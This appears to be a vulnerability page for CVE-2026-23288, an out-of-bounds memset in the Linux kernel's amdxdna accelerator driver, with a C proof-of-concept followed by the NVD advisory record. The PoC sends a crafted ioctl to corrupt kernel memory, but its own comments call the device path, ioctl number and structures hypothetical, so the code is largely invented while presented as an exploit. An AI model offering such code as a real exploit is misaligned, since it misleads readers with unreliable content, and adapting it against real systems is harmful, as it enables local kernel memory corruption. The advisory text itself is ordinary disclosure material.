CVE-2026-23288

/* * PoC for CVE-2026-23288 * Trigger out-of-bounds memset in Linux kernel accel/amdxdna driver. * Requires access to the amdxdna device interface. */ #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #include <unistd.h> #include <sys/ioctl.h> // Hypothetical device path and IOCTL definitions based on typical kernel drivers #define AMDXDNA_DEVICE "/dev/amdxdna0" #define AMDXDNA_IOCTL_SUBMIT_CMD 0x8001 struct amdxdna_cmd_header { uint32_t size; uint32_t flags; // ... other header fields ... }; struct amdxdna_cmd { struct amdxdna_cmd_header header; // Payload data }; int main() { int fd; struct amdxdna_cmd cmd; // Open the device fd = open(AMDXDNA_DEVICE, O_RDWR); if (fd < 0) { perror("Failed to open device"); return EXIT_FAILURE; } printf("[+] Opened %s\n", AMDXDNA_DEVICE); // Initialize command with a specific size that triggers the logic flaw // The driver expects a minimum size, but the vulnerable code path // might memset based on a header size before checking the allocated slot size. memset(&cmd, 0, sizeof(cmd)); cmd.header.size = 0x10; // Small size to potentially trigger validation issue // Submit command to kernel printf("[*] Sending malicious command...\n"); if (ioctl(fd, AMDXDNA_IOCTL_SUBMIT_CMD, &cmd) < 0) { perror("IOCTL failed"); close(fd); return EXIT_FAILURE; } printf("[+] Command sent. Check dmesg for kernel OOPS or panic.\n"); close(fd); return EXIT_SUCCESS; }

{"cve": {"id": "CVE-2026-23288", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-03-25T11:16:23.767", "lastModified": "2026-04-02T15:16:30.343", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\naccel/amdxdna: Fix out-of-bounds memset in command slot handling\n\nThe remaining space in a command slot may be smaller than the size of\nthe command header. Clearing the command header with memset() before\nverifying the available slot space can result in an out-of-bounds write\nand memory corruption.\n\nFix this by moving the memset() call after the size validation."}, {"lang": "es", "value": "En el kernel de Linux, se ha resuelto la siguiente vulnerabilidad:\n\naccel/amdxdna: Corrección de memset fuera de límites en el manejo de ranuras de comando\n\nEl espacio restante en una ranura de comando puede ser menor que el tamaño del encabezado de comando. Borrar el encabezado de comando con memset() antes de verificar el espacio de ranura disponible puede resultar en una escritura fuera de límites y corrupción de memoria.\n\nEsto se corrige moviendo la llamada a memset() después de la validación del tamaño."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "references": [{"url": "https://git.kernel.org/stable/c/1110a949675ebd56b3f0286e664ea543f745801c", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/cca770d710d5e03bc814af585cd6975eb6d74074", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}]}}